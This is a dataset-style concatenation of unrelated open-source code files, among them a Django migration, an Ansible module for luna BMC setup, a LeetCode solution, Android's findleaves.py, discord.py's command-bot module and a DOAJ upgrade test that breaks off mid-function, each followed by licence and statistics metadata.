if gjr['purity'] < tolpr:
print j ,".class ", r ,".cluster classification function that separates A from B: gjr = w.(x-c) + ksi*|w.(x-c)|-gamma "
print "w =", gjr['w']
print "ksi =", gjr['ksi']
print "gamma =", gjr['gamma']
print "center =", gjr['c']
else:
print j,".class ", r, ".cluster classification function that separates A from B: gjr = |x-c|_2 - gamma "
print "gamma =", gjr['gamma']
print "center =", gjr['c']
print "-----------------------------------------------------------"
r=r+1
j=j+1
print "##################################################################"
print "Training Accuracy : %", EgitimDogrulukOrani
print "Test Accuracy : % ", TestDogrulukOrani
print "##################################################################"
print("--- %s seconds elapsed ---" % (time.time() - start_time))
|
mit
| -6,865,739,474,599,376,000
| 26.641892
| 185
| 0.558788
| false
| 2.923187
| true
| false
| false
|
jesseklein406/django-imager
|
imagersite/imager_images/migrations/0004_auto_20150728_1555.py
|
1
|
1063
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('imager_images', '0003_auto_20150726_1224'),
]
operations = [
migrations.AlterField(
model_name='album',
name='date_published',
field=models.DateField(null=True, blank=True),
),
migrations.AlterField(
model_name='album',
name='description',
field=models.TextField(blank=True),
),
migrations.AlterField(
model_name='photo',
name='date_published',
field=models.DateField(null=True, blank=True),
),
migrations.AlterField(
model_name='photo',
name='description',
field=models.TextField(blank=True),
),
migrations.AlterField(
model_name='photo',
name='title',
field=models.CharField(max_length=256, blank=True),
),
]
|
mit
| -1,288,981,641,645,240,300
| 26.25641
| 63
| 0.543744
| false
| 4.504237
| false
| false
| false
|
dchirikov/luna
|
contrib/ansible/modules/clustering/luna_bmcsetup.py
|
1
|
2793
|
#!/usr/bin/python
from ansible.module_utils.basic import AnsibleModule
from ansible.errors import AnsibleError
try:
import luna
except ImportError:
raise AnsibleError("luna is not installed")
from luna_ansible.helpers import StreamStringLogger
import logging
if luna.__version__ != '1.2':
raise AnsibleError("Only luna-1.2 is supported")
def luna_bmcsetup_present(data):
data.pop('state')
name = data.pop('name')
changed = False
ret = True
try:
bmcsetup = luna.BMCSetup(name=name)
except RuntimeError:
args = {}
for key in data:
if data[key] is not None:
args[key] = data[key]
args['name']=name
args['create']=True
bmcsetup = luna.BMCSetup(**args)
changed = True
for key in data:
if data[key] is not None and bmcsetup.get(key) != data[key]:
changed = True
ret &= bmcsetup.set(key, data[key])
return not ret, changed, str(bmcsetup)
def luna_bmcsetup_absent(data):
name = data['name']
try:
bmcsetup = luna.BMCSetup(name=name)
except RuntimeError:
return False, False, name
res = bmcsetup.delete()
return not res, res, name
def main():
log_string = StreamStringLogger()
loghandler = logging.StreamHandler(stream=log_string)
formatter = logging.Formatter('%(levelname)s: %(message)s')
logger = logging.getLogger()
loghandler.setFormatter(formatter)
logger.addHandler(loghandler)
module = AnsibleModule(
argument_spec={
'name': {
'type': 'str', 'required': True},
'user': {
'type': 'str', 'required': False},
'password': {
'type': 'str', 'default': None, 'required': False,
'no_log': True},
'mgmtchannel': {
'type': 'int', 'default': None, 'required': False},
'netchannel': {
'type': 'int', 'default': None, 'required': False},
'userid': {
'type': 'int', 'default': None, 'required': False},
'comment': {
'type': 'str', 'default': None, 'required': False},
'state': {
'type': 'str', 'default': 'present',
'choices': ['present', 'absent']}
}
)
choice_map = {
"present": luna_bmcsetup_present,
"absent": luna_bmcsetup_absent,
}
is_error, has_changed, result = choice_map.get(
module.params['state'])(module.params)
if not is_error:
module.exit_json(changed=has_changed, msg=str(log_string), meta=result)
else:
module.fail_json(changed=has_changed, msg=str(log_string), meta=result)
if __name__ == '__main__':
main()
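# Example playbook task for this module (all values are illustrative):
#
#   - luna_bmcsetup:
#       name: base
#       user: admin
#       password: secret
#       state: present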
|
gpl-3.0
| -39,312,346,139,698,100
| 26.653465
| 79
| 0.557465
| false
| 3.784553
| false
| false
| false
|
95subodh/Leetcode
|
376. Wiggle Subsequence.py
|
1
|
1580
|
#A sequence of numbers is called a wiggle sequence if the differences between successive numbers strictly alternate between positive and negative. The first difference (if one exists) may be either positive or negative. A sequence with fewer than two elements is trivially a wiggle sequence.
#
#For example, [1,7,4,9,2,5] is a wiggle sequence because the differences (6,-3,5,-7,3) are alternately positive and negative. In contrast, [1,4,7,2,5] and [1,7,4,5,5] are not wiggle sequences, the first because its first two differences are positive and the second because its last difference is zero.
#
#Given a sequence of integers, return the length of the longest subsequence that is a wiggle sequence. A subsequence is obtained by deleting some number of elements (eventually, also zero) from the original sequence, leaving the remaining elements in their original order.
#
#Examples:
#Input: [1,7,4,9,2,5]
#Output: 6
#The entire sequence is a wiggle sequence.
#
#Input: [1,17,5,10,13,15,10,5,16,8]
#Output: 7
#There are several subsequences that achieve this length. One is [1,17,10,13,10,16,8].
#
#Input: [1,2,3,4,5,6,7,8,9]
#Output: 2
class Solution(object):
def wiggleMaxLength(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
length, direction = 1, None
for i in xrange(1, len(nums)):
if nums[i - 1] < nums[i] and (direction is None or direction is False):
length += 1
direction = True
elif nums[i - 1] > nums[i] and (direction is None or direction is True):
length += 1
direction = False
return length if len(nums)>1 else len(nums)
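# A quick sanity check against the worked examples in the problem statement
# above (illustrative only; LeetCode invokes wiggleMaxLength directly):
if __name__ == '__main__':
    s = Solution()
    assert s.wiggleMaxLength([1, 7, 4, 9, 2, 5]) == 6
    assert s.wiggleMaxLength([1, 17, 5, 10, 13, 15, 10, 5, 16, 8]) == 7
    assert s.wiggleMaxLength([1, 2, 3, 4, 5, 6, 7, 8, 9]) == 2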
|
mit
| 877,606,916,788,035,800
| 46.909091
| 301
| 0.724684
| false
| 3.204868
| false
| false
| false
|
a4a881d4/fs45g
|
fs45g/fs45gstat.py
|
1
|
1031
|
import fuse
class fs45gStat(fuse.Stat):
def __init__(self):
self.st_mode = 0
self.st_ino = 0
self.st_dev = 0
self.st_nlink = 0
self.st_uid = 0
self.st_gid = 0
self.st_size = 0
self.st_atime = 0
self.st_mtime = 0
self.st_ctime = 0
class fs45gROStat(fs45gStat):
def __init__(self, clone, uid, gid):
super(fs45gStat,self).__setattr__('st_mode',clone.st_mode)
		super(fs45gStat,self).__setattr__('st_ino',clone.st_ino)
super(fs45gStat,self).__setattr__('st_dev',clone.st_dev)
super(fs45gStat,self).__setattr__('st_nlink',clone.st_nlink)
super(fs45gStat,self).__setattr__('st_uid',uid)
super(fs45gStat,self).__setattr__('st_gid',gid)
super(fs45gStat,self).__setattr__('st_size',clone.st_size)
super(fs45gStat,self).__setattr__('st_atime',clone.st_atime)
super(fs45gStat,self).__setattr__('st_mtime',clone.st_mtime)
super(fs45gStat,self).__setattr__('st_ctime',clone.st_ctime)
def __setattr__(self, *args):
raise TypeError("can't modify immutable instance")
__delattr__ = __setattr__
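# Illustrative usage (requires the python-fuse bindings imported above;
# the uid/gid values are arbitrary):
#
#   base = fs45gStat()
#   base.st_size = 4096
#   ro = fs45gROStat(base, 1000, 1000)
#   ro.st_size = 0   # raises TypeError: can't modify immutable instance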
|
apache-2.0
| -6,573,624,865,860,555,000
| 31.21875
| 63
| 0.659554
| false
| 2.58396
| false
| false
| false
|
dAck2cC2/m3e
|
build_legacy/tools/findleaves.py
|
1
|
3628
|
#!/usr/bin/env python
#
# Copyright (C) 2009 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
# Finds files with the specified name under a particular directory, stopping
# the search in a given subdirectory when the file is found.
#
import os
import sys
def perform_find(mindepth, prune, dirlist, filenames):
result = []
pruneleaves = set(map(lambda x: os.path.split(x)[1], prune))
seen = set()
for rootdir in dirlist:
rootdepth = rootdir.count("/")
for root, dirs, files in os.walk(rootdir, followlinks=True):
# prune
check_prune = False
for d in dirs:
if d in pruneleaves:
check_prune = True
break
if check_prune:
i = 0
while i < len(dirs):
if dirs[i] in prune:
del dirs[i]
else:
i += 1
# mindepth
if mindepth > 0:
depth = 1 + root.count("/") - rootdepth
if depth < mindepth:
continue
# match
for filename in filenames:
if filename in files:
result.append(os.path.join(root, filename))
del dirs[:]
# filter out inodes that have already been seen due to symlink loops
i = 0
while i < len(dirs):
st = os.stat(os.path.join(root, dirs[i]))
key = (st.st_dev, st.st_ino)
if key in seen:
del dirs[i]
else:
i += 1
seen.add(key)
return result
def usage():
sys.stderr.write("""Usage: %(progName)s [<options>] [--dir=<dir>] <filenames>
Options:
--mindepth=<mindepth>
Both behave in the same way as their find(1) equivalents.
--prune=<dirname>
Avoids returning results from inside any directory called <dirname>
(e.g., "*/out/*"). May be used multiple times.
--dir=<dir>
Add a directory to search. May be repeated multiple times. For backwards
compatibility, if no --dir argument is provided then all but the last entry
in <filenames> are treated as directories.
""" % {
"progName": os.path.split(sys.argv[0])[1],
})
sys.exit(1)
def main(argv):
mindepth = -1
prune = []
dirlist = []
i=1
while i<len(argv) and len(argv[i])>2 and argv[i][0:2] == "--":
arg = argv[i]
if arg.startswith("--mindepth="):
try:
mindepth = int(arg[len("--mindepth="):])
except ValueError:
usage()
elif arg.startswith("--prune="):
p = arg[len("--prune="):]
if len(p) == 0:
usage()
prune.append(p)
elif arg.startswith("--dir="):
d = arg[len("--dir="):]
      if len(d) == 0:
usage()
dirlist.append(d)
else:
usage()
i += 1
if len(dirlist) == 0: # backwards compatibility
if len(argv)-i < 2: # need both <dirlist> and <filename>
usage()
dirlist = argv[i:-1]
filenames = [argv[-1]]
else:
if len(argv)-i < 1: # need <filename>
usage()
filenames = argv[i:]
results = list(set(perform_find(mindepth, prune, dirlist, filenames)))
results.sort()
for r in results:
print r
if __name__ == "__main__":
main(sys.argv)
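# Example invocation (hypothetical paths), matching the usage text above:
#   findleaves.py --prune=out --mindepth=2 --dir=frameworks --dir=packages Android.mk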
|
apache-2.0
| 5,406,521,903,935,846,000
| 27.566929
| 82
| 0.595645
| false
| 3.617149
| false
| false
| false
|
NicovincX2/Python-3.5
|
Statistiques/Estimation (statistique)/Régression/bay_ridge_OLS.py
|
1
|
2049
|
# -*- coding: utf-8 -*-
import os
import numpy as np
import matplotlib.pyplot as plt
from scipy import stats
from sklearn.linear_model import BayesianRidge, LinearRegression
###############################################################################
# Generating simulated data with Gaussian weigthts
np.random.seed(0)
n_samples, n_features = 100, 100
X = np.random.randn(n_samples, n_features) # Create Gaussian data
# Create weigts with a precision lambda_ of 4.
lambda_ = 4.
w = np.zeros(n_features)
# Only keep 10 weights of interest
relevant_features = np.random.randint(0, n_features, 10)
for i in relevant_features:
w[i] = stats.norm.rvs(loc=0, scale=1. / np.sqrt(lambda_))
# Create noise with a precision alpha of 50.
alpha_ = 50.
noise = stats.norm.rvs(loc=0, scale=1. / np.sqrt(alpha_), size=n_samples)
# Create the target
y = np.dot(X, w) + noise
###############################################################################
# Fit the Bayesian Ridge Regression and an OLS for comparison
clf = BayesianRidge(compute_score=True)
clf.fit(X, y)
ols = LinearRegression()
ols.fit(X, y)
###############################################################################
# Plot true weights, estimated weights and histogram of the weights
plt.figure(figsize=(6, 5))
plt.title("Weights of the model")
plt.plot(clf.coef_, 'b-', label="Bayesian Ridge estimate")
plt.plot(w, 'g-', label="Ground truth")
plt.plot(ols.coef_, 'r--', label="OLS estimate")
plt.xlabel("Features")
plt.ylabel("Values of the weights")
plt.legend(loc="best", prop=dict(size=12))
plt.figure(figsize=(6, 5))
plt.title("Histogram of the weights")
plt.hist(clf.coef_, bins=n_features, log=True)
plt.plot(clf.coef_[relevant_features], 5 * np.ones(len(relevant_features)),
'ro', label="Relevant features")
plt.ylabel("Features")
plt.xlabel("Values of the weights")
plt.legend(loc="lower left")
plt.figure(figsize=(6, 5))
plt.title("Marginal log-likelihood")
plt.plot(clf.scores_)
plt.ylabel("Score")
plt.xlabel("Iterations")
plt.show()
os.system("pause")
|
gpl-3.0
| 3,795,073,158,633,134,000
| 31.52381
| 79
| 0.63348
| false
| 3.359016
| false
| false
| false
|
variablehair/Eggplantato
|
discord/ext/commands/bot.py
|
1
|
26536
|
# -*- coding: utf-8 -*-
"""
The MIT License (MIT)
Copyright (c) 2015-2017 Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
import asyncio
import discord
import inspect
import importlib
import sys
import traceback
import re
from .core import GroupMixin, Command, command
from .view import StringView
from .context import Context
from .errors import CommandNotFound, CommandError
from .formatter import HelpFormatter
def when_mentioned(bot, msg):
"""A callable that implements a command prefix equivalent
to being mentioned, e.g. ``@bot ``."""
guild = msg.guild
if guild is not None:
return '{0.me.mention} '.format(guild)
return '{0.user.mention} '.format(bot)
def when_mentioned_or(*prefixes):
"""A callable that implements when mentioned or other prefixes provided.
Example
--------
.. code-block:: python
bot = commands.Bot(command_prefix=commands.when_mentioned_or('!'))
See Also
----------
:func:`when_mentioned`
"""
def inner(bot, msg):
r = list(prefixes)
r.append(when_mentioned(bot, msg))
return r
return inner
_mentions_transforms = {
'@everyone': '@\u200beveryone',
'@here': '@\u200bhere'
}
_mention_pattern = re.compile('|'.join(_mentions_transforms.keys()))
@asyncio.coroutine
def _default_help_command(ctx, *commands : str):
"""Shows this message."""
bot = ctx.bot
destination = ctx.message.author if bot.pm_help else ctx.message.channel
def repl(obj):
return _mentions_transforms.get(obj.group(0), '')
# help by itself just lists our own commands.
if len(commands) == 0:
pages = yield from bot.formatter.format_help_for(ctx, bot)
elif len(commands) == 1:
# try to see if it is a cog name
name = _mention_pattern.sub(repl, commands[0])
command = None
if name in bot.cogs:
command = bot.cogs[name]
else:
command = bot.commands.get(name)
if command is None:
yield from destination.send(bot.command_not_found.format(name))
return
pages = yield from bot.formatter.format_help_for(ctx, command)
else:
name = _mention_pattern.sub(repl, commands[0])
command = bot.commands.get(name)
if command is None:
yield from destination.send(bot.command_not_found.format(name))
return
for key in commands[1:]:
try:
key = _mention_pattern.sub(repl, key)
command = command.commands.get(key)
if command is None:
yield from destination.send(bot.command_not_found.format(key))
return
except AttributeError:
yield from destination.send(bot.command_has_no_subcommands.format(command, key))
return
pages = yield from bot.formatter.format_help_for(ctx, command)
if bot.pm_help is None:
characters = sum(map(lambda l: len(l), pages))
# modify destination based on length of pages.
if characters > 1000:
destination = ctx.message.author
for page in pages:
yield from destination.send(page)
class BotBase(GroupMixin):
def __init__(self, command_prefix, formatter=None, description=None, pm_help=False, **options):
super().__init__(**options)
self.command_prefix = command_prefix
self.extra_events = {}
self.cogs = {}
self.extensions = {}
self._checks = []
self._before_invoke = None
self._after_invoke = None
self.description = inspect.cleandoc(description) if description else ''
self.pm_help = pm_help
self.command_not_found = options.pop('command_not_found', 'No command called "{}" found.')
self.command_has_no_subcommands = options.pop('command_has_no_subcommands', 'Command {0.name} has no subcommands.')
if options.pop('self_bot', False):
self._skip_check = lambda x, y: x != y
else:
self._skip_check = lambda x, y: x == y
self.help_attrs = options.pop('help_attrs', {})
self.help_attrs['pass_context'] = True
if 'name' not in self.help_attrs:
self.help_attrs['name'] = 'help'
if formatter is not None:
if not isinstance(formatter, HelpFormatter):
raise discord.ClientException('Formatter must be a subclass of HelpFormatter')
self.formatter = formatter
else:
self.formatter = HelpFormatter()
# pay no mind to this ugliness.
self.command(**self.help_attrs)(_default_help_command)
# internal helpers
def dispatch(self, event_name, *args, **kwargs):
super().dispatch(event_name, *args, **kwargs)
ev = 'on_' + event_name
for event in self.extra_events.get(ev, []):
coro = self._run_event(event, event_name, *args, **kwargs)
discord.compat.create_task(coro, loop=self.loop)
@asyncio.coroutine
def close(self):
for extension in tuple(self.extensions):
try:
self.unload_extension(extension)
except:
pass
for cog in tuple(self.cogs):
try:
self.remove_cog(cog)
except:
pass
yield from super().close()
@asyncio.coroutine
def on_command_error(self, exception, context):
"""|coro|
The default command error handler provided by the bot.
By default this prints to ``sys.stderr`` however it could be
overridden to have a different implementation.
This only fires if you do not specify any listeners for command error.
"""
if self.extra_events.get('on_command_error', None):
return
if hasattr(context.command, "on_error"):
return
print('Ignoring exception in command {}'.format(context.command), file=sys.stderr)
traceback.print_exception(type(exception), exception, exception.__traceback__, file=sys.stderr)
# global check registration
def check(self, func):
"""A decorator that adds a global check to the bot.
A global check is similar to a :func:`check` that is applied
on a per command basis except it is run before any command checks
have been verified and applies to every command the bot has.
        .. note::
This function can either be a regular function or a coroutine.
Similar to a command :func:`check`\, this takes a single parameter
of type :class:`Context` and can only raise exceptions derived from
:exc:`CommandError`.
Example
---------
.. code-block:: python
@bot.check
def whitelist(ctx):
return ctx.message.author.id in my_whitelist
"""
self.add_check(func)
return func
def add_check(self, func):
"""Adds a global check to the bot.
This is the non-decorator interface to :meth:`check`.
Parameters
-----------
func
The function that was used as a global check.
"""
self._checks.append(func)
def remove_check(self, func):
"""Removes a global check from the bot.
This function is idempotent and will not raise an exception
if the function is not in the global checks.
Parameters
-----------
func
The function to remove from the global checks.
"""
try:
self._checks.remove(func)
except ValueError:
pass
@asyncio.coroutine
def can_run(self, ctx):
if len(self._checks) == 0:
return True
return (yield from discord.utils.async_all(f(ctx) for f in self._checks))
def before_invoke(self, coro):
"""A decorator that registers a coroutine as a pre-invoke hook.
A pre-invoke hook is called directly before the command is
called. This makes it a useful function to set up database
connections or any type of set up required.
This pre-invoke hook takes a sole parameter, a :class:`Context`.
.. note::
The :meth:`before_invoke` and :meth:`after_invoke` hooks are
only called if all checks and argument parsing procedures pass
without error. If any check or argument parsing procedures fail
then the hooks are not called.
Parameters
-----------
coro
The coroutine to register as the pre-invoke hook.
Raises
-------
discord.ClientException
The coroutine is not actually a coroutine.
"""
if not asyncio.iscoroutinefunction(coro):
raise discord.ClientException('The error handler must be a coroutine.')
self._before_invoke = coro
return coro
def after_invoke(self, coro):
"""A decorator that registers a coroutine as a post-invoke hook.
A post-invoke hook is called directly after the command is
called. This makes it a useful function to clean-up database
connections or any type of clean up required.
This post-invoke hook takes a sole parameter, a :class:`Context`.
.. note::
Similar to :meth:`before_invoke`\, this is not called unless
checks and argument parsing procedures succeed. This hook is,
however, **always** called regardless of the internal command
callback raising an error (i.e. :exc:`CommandInvokeError`\).
This makes it ideal for clean-up scenarios.
Parameters
-----------
coro
The coroutine to register as the post-invoke hook.
Raises
-------
discord.ClientException
The coroutine is not actually a coroutine.
"""
if not asyncio.iscoroutinefunction(coro):
raise discord.ClientException('The error handler must be a coroutine.')
self._after_invoke = coro
return coro
# listener registration
def add_listener(self, func, name=None):
"""The non decorator alternative to :meth:`listen`.
Parameters
-----------
func : coroutine
The extra event to listen to.
name : Optional[str]
The name of the command to use. Defaults to ``func.__name__``.
Example
--------
.. code-block:: python
async def on_ready(): pass
async def my_message(message): pass
bot.add_listener(on_ready)
bot.add_listener(my_message, 'on_message')
"""
name = func.__name__ if name is None else name
if not asyncio.iscoroutinefunction(func):
raise discord.ClientException('Listeners must be coroutines')
if name in self.extra_events:
self.extra_events[name].append(func)
else:
self.extra_events[name] = [func]
def remove_listener(self, func, name=None):
"""Removes a listener from the pool of listeners.
Parameters
-----------
func
The function that was used as a listener to remove.
name
The name of the event we want to remove. Defaults to
``func.__name__``.
"""
name = func.__name__ if name is None else name
if name in self.extra_events:
try:
self.extra_events[name].remove(func)
except ValueError:
pass
def listen(self, name=None):
"""A decorator that registers another function as an external
event listener. Basically this allows you to listen to multiple
events from different places e.g. such as :func:`discord.on_ready`
The functions being listened to must be a coroutine.
Example
--------
.. code-block:: python
@bot.listen()
async def on_message(message):
print('one')
# in some other file...
@bot.listen('on_message')
async def my_message(message):
print('two')
Would print one and two in an unspecified order.
Raises
-------
discord.ClientException
The function being listened to is not a coroutine.
"""
def decorator(func):
self.add_listener(func, name)
return func
return decorator
# cogs
def add_cog(self, cog):
"""Adds a "cog" to the bot.
A cog is a class that has its own event listeners and commands.
They are meant as a way to organize multiple relevant commands
into a singular class that shares some state or no state at all.
The cog can also have a ``__global_check`` member function that allows
you to define a global check. See :meth:`check` for more info.
More information will be documented soon.
Parameters
-----------
cog
The cog to register to the bot.
"""
self.cogs[type(cog).__name__] = cog
try:
check = getattr(cog, '_{.__class__.__name__}__global_check'.format(cog))
except AttributeError:
pass
else:
self.add_check(check)
members = inspect.getmembers(cog)
for name, member in members:
# register commands the cog has
if isinstance(member, Command):
if member.parent is None:
self.add_command(member)
continue
# register event listeners the cog has
if name.startswith('on_'):
self.add_listener(member, name)
def get_cog(self, name):
"""Gets the cog instance requested.
If the cog is not found, ``None`` is returned instead.
Parameters
-----------
name : str
The name of the cog you are requesting.
"""
return self.cogs.get(name)
def remove_cog(self, name):
"""Removes a cog from the bot.
All registered commands and event listeners that the
cog has registered will be removed as well.
If no cog is found then ``None`` is returned, otherwise
the cog instance that is being removed is returned.
If the cog defines a special member function named ``__unload``
then it is called when removal has completed. This function
**cannot** be a coroutine. It must be a regular function.
Parameters
-----------
name : str
The name of the cog to remove.
"""
cog = self.cogs.pop(name, None)
if cog is None:
return cog
members = inspect.getmembers(cog)
for name, member in members:
# remove commands the cog has
if isinstance(member, Command):
if member.parent is None:
self.remove_command(member.name)
continue
# remove event listeners the cog has
if name.startswith('on_'):
self.remove_listener(member)
try:
check = getattr(cog, '_{0.__class__.__name__}__global_check'.format(cog))
except AttributeError:
pass
else:
self.remove_check(check)
unloader_name = '_{0.__class__.__name__}__unload'.format(cog)
try:
unloader = getattr(cog, unloader_name)
except AttributeError:
pass
else:
unloader()
del cog
# extensions
def load_extension(self, name):
if name in self.extensions:
return
lib = importlib.import_module(name)
if not hasattr(lib, 'setup'):
del lib
del sys.modules[name]
raise discord.ClientException('extension does not have a setup function')
lib.setup(self)
self.extensions[name] = lib
def unload_extension(self, name):
lib = self.extensions.get(name)
if lib is None:
return
# find all references to the module
# remove the cogs registered from the module
for cogname, cog in self.cogs.copy().items():
if inspect.getmodule(cog) is lib:
self.remove_cog(cogname)
# first remove all the commands from the module
for command in self.commands.copy().values():
if command.module is lib:
command.module = None
if isinstance(command, GroupMixin):
command.recursively_remove_all_commands()
self.remove_command(command.name)
# then remove all the listeners from the module
for event_list in self.extra_events.copy().values():
remove = []
for index, event in enumerate(event_list):
if inspect.getmodule(event) is lib:
remove.append(index)
for index in reversed(remove):
del event_list[index]
try:
func = getattr(lib, 'teardown')
except AttributeError:
pass
else:
try:
func(self)
except:
pass
finally:
# finally remove the import..
del lib
del self.extensions[name]
del sys.modules[name]
# command processing
@asyncio.coroutine
def get_prefix(self, message):
"""|coro|
Retrieves the prefix the bot is listening to
with the message as a context.
Parameters
-----------
message: :class:`discord.Message`
The message context to get the prefix of.
Returns
--------
Union[List[str], str]
A list of prefixes or a single prefix that the bot is
listening for.
"""
prefix = self.command_prefix
if callable(prefix):
ret = prefix(self, message)
if asyncio.iscoroutine(ret):
ret = yield from ret
return ret
else:
return prefix
@asyncio.coroutine
def get_context(self, message, *, cls=Context):
"""|coro|
Returns the invocation context from the message.
This is a more low-level counter-part for :meth:`process_message`
to allow users more fine grained control over the processing.
The returned context is not guaranteed to be a valid invocation
context, :attr:`Context.valid` must be checked to make sure it is.
If the context is not valid then it is not a valid candidate to be
invoked under :meth:`invoke`.
Parameters
-----------
message: :class:`discord.Message`
The message to get the invocation context from.
cls: type
The factory class that will be used to create the context.
By default, this is :class:`Context`. Should a custom
class be provided, it must be similar enough to :class:`Context`\'s
interface.
Returns
--------
:class:`Context`
The invocation context. The type of this can change via the
``cls`` parameter.
"""
view = StringView(message.content)
ctx = cls(prefix=None, view=view, bot=self, message=message)
if self._skip_check(message.author.id, self.user.id):
return ctx
prefix = yield from self.get_prefix(message)
invoked_prefix = prefix
if not isinstance(prefix, (tuple, list)):
if not view.skip_string(prefix):
return ctx
else:
invoked_prefix = discord.utils.find(view.skip_string, prefix)
if invoked_prefix is None:
return ctx
invoker = view.get_word()
ctx.invoked_with = invoker
ctx.prefix = invoked_prefix
ctx.command = self.commands.get(invoker)
return ctx
@asyncio.coroutine
def invoke(self, ctx):
"""|coro|
Invokes the command given under the invocation context and
handles all the internal event dispatch mechanisms.
Parameters
-----------
ctx: :class:`Context`
The invocation context to invoke.
"""
if ctx.command is not None:
self.dispatch('command', ctx)
try:
yield from ctx.command.invoke(ctx)
except CommandError as e:
yield from ctx.command.dispatch_error(e, ctx)
else:
ctx.command_failed = False
self.dispatch('command_completion', ctx)
elif ctx.invoked_with:
exc = CommandNotFound('Command "{}" is not found'.format(ctx.invoked_with))
self.dispatch('command_error', exc, ctx)
@asyncio.coroutine
def process_commands(self, message):
"""|coro|
This function processes the commands that have been registered
to the bot and other groups. Without this coroutine, none of the
commands will be triggered.
By default, this coroutine is called inside the :func:`on_message`
event. If you choose to override the :func:`on_message` event, then
you should invoke this coroutine as well.
This is built using other low level tools, and is equivalent to a
call to :meth:`get_context` followed by a call to :meth:`invoke`.
Parameters
-----------
message : discord.Message
The message to process commands for.
"""
ctx = yield from self.get_context(message)
yield from self.invoke(ctx)
@asyncio.coroutine
def on_message(self, message):
yield from self.process_commands(message)
class Bot(BotBase, discord.Client):
"""Represents a discord bot.
This class is a subclass of :class:`discord.Client` and as a result
anything that you can do with a :class:`discord.Client` you can do with
this bot.
This class also subclasses :class:`GroupMixin` to provide the functionality
to manage commands.
Attributes
-----------
command_prefix
The command prefix is what the message content must contain initially
to have a command invoked. This prefix could either be a string to
indicate what the prefix should be, or a callable that takes in the bot
as its first parameter and :class:`discord.Message` as its second
parameter and returns the prefix. This is to facilitate "dynamic"
command prefixes. This callable can be either a regular function or
a coroutine.
The command prefix could also be a list or a tuple indicating that
multiple checks for the prefix should be used and the first one to
match will be the invocation prefix. You can get this prefix via
:attr:`Context.prefix`.
description : str
The content prefixed into the default help message.
self_bot : bool
If ``True``, the bot will only listen to commands invoked by itself rather
than ignoring itself. If ``False`` (the default) then the bot will ignore
itself. This cannot be changed once initialised.
formatter : :class:`HelpFormatter`
The formatter used to format the help message. By default, it uses a
the :class:`HelpFormatter`. Check it for more info on how to override it.
If you want to change the help command completely (add aliases, etc) then
a call to :meth:`remove_command` with 'help' as the argument would do the
trick.
pm_help : Optional[bool]
A tribool that indicates if the help command should PM the user instead of
sending it to the channel it received it from. If the boolean is set to
``True``, then all help output is PM'd. If ``False``, none of the help
output is PM'd. If ``None``, then the bot will only PM when the help
message becomes too long (dictated by more than 1000 characters).
Defaults to ``False``.
help_attrs : dict
A dictionary of options to pass in for the construction of the help command.
This allows you to change the command behaviour without actually changing
the implementation of the command. The attributes will be the same as the
ones passed in the :class:`Command` constructor. Note that ``pass_context``
will always be set to ``True`` regardless of what you pass in.
command_not_found : str
The format string used when the help command is invoked with a command that
is not found. Useful for i18n. Defaults to ``"No command called {} found."``.
The only format argument is the name of the command passed.
command_has_no_subcommands : str
The format string used when the help command is invoked with requests for a
subcommand but the command does not have any subcommands. Defaults to
``"Command {0.name} has no subcommands."``. The first format argument is the
:class:`Command` attempted to get a subcommand and the second is the name.
"""
pass
class AutoShardedBot(BotBase, discord.AutoShardedClient):
"""This is similar to :class:`Bot` except that it is derived from
:class:`discord.AutoShardedClient` instead.
"""
pass
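# Minimal usage sketch for this module (illustrative only; the token is a
# placeholder and the command prefix is an arbitrary choice):
#
#   from discord.ext import commands
#   bot = commands.Bot(command_prefix=commands.when_mentioned_or('!'),
#                      description='An example bot.')
#   @bot.listen()
#   async def on_ready():
#       print('logged in as', bot.user)
#   bot.run('TOKEN')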
|
mit
| -222,379,513,342,976,670
| 32.17
| 123
| 0.599525
| false
| 4.544614
| false
| false
| false
|
DOAJ/doaj
|
doajtest/unit/test_upgrade.py
|
1
|
2252
|
import json
import time
import re
from collections import OrderedDict
from doajtest.helpers import DoajTestCase
from portality import models
from portality.upgrade import do_upgrade
from portality.lib.paths import rel2abs
def operation(journal):
j = models.Journal.pull(journal.id)
bj = j.bibjson()
bj.title = "Updated Title"
j.save()
return j
class TestUpgrade(DoajTestCase):
def test_upgrade(self):
# populate the index with some journals with title
saved_journals = {}
for i in range(5):
j = models.Journal()
j.set_in_doaj(True)
bj = j.bibjson()
bj.title = "Test Journal"
bj.add_identifier(bj.P_ISSN, "{x}000-0000".format(x=i))
bj.publisher = "Test Publisher {x}".format(x=i)
bj.add_url("http://homepage.com/{x}".format(x=i), "homepage")
j.save()
saved_journals[j.id] = j.last_updated
# and with some journals without title
for i in range(5):
j = models.Journal()
j.set_in_doaj(True)
bj = j.bibjson()
bj.add_identifier(bj.P_ISSN, "{x}000-0001".format(x=i))
bj.title = "Journal to Change"
bj.publisher = "Test Publisher {x}".format(x=i)
bj.add_url("http://homepage.com/{x}".format(x=i), "homepage")
j.save()
saved_journals[j.id] = j.last_updated
# make sure the last updated dates will be suitably different after migration
time.sleep(1.5)
        path = rel2abs(__file__, ".", "resources", "migrate.json")
